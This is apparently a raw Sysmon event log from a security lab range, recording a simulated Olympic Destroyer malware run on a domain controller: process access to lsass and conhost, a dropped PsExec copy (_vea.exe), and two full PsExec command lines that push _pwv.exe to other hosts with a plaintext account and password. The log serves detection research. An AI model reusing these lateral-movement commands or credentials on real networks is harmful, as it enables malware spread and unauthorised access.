10341000x8000000000000000293592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.545{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1373-6216-6B06-000000003802}6308C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.511{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1373-6216-6A06-000000003802}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.511{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1373-6216-6A06-000000003802}6804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.459{C8EA50B7-1373-6216-6B06-000000003802}63086848C:\Windows\system32\conhost.exe{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.411{C8EA50B7-1373-6216-6A06-000000003802}68045896C:\Windows\system32\conhost.exe{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.343{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1373-6216-6B06-000000003802}6308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.258{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1373-6216-6B06-000000003802}6308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.210{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1373-6216-6A06-000000003802}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.173{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1373-6216-6A06-000000003802}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.057{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.057{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.057{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.057{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.057{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.057{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.060{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.057{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.042{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.042{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.044{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.042{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.252{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57566- 354300x8000000000000000293605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.218{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55587- 23542300x8000000000000000293604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:00.565{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A99288288D0C65712F1621C69332ACD5,SHA256=A47BCFF449F8376A3120EA7F2A98F5721E231FC0C0DBEF70230BE2F950B00210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:00.442{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E69B226B83528F73C220476BD6D93016,SHA256=71BEE4BC9405987A791B741D50FD2DDAB0997F10C385FCBADF1BC3F4675FC16E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:00.334{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:00.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=65225BA27C1657D9CDFC332CB0615D33,SHA256=1ED053BD33D82138E3C27A05712ED8B84A1C38EE3911216C7BB5C054B9031450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:00.108{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C889C03A7352C7739363ABCB916EF8FD,SHA256=059C0A249E9B1B6893F2EA70771D7AEC9021BCE6CC0F9E8E4017BB3E24C96731,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.744{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.744{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 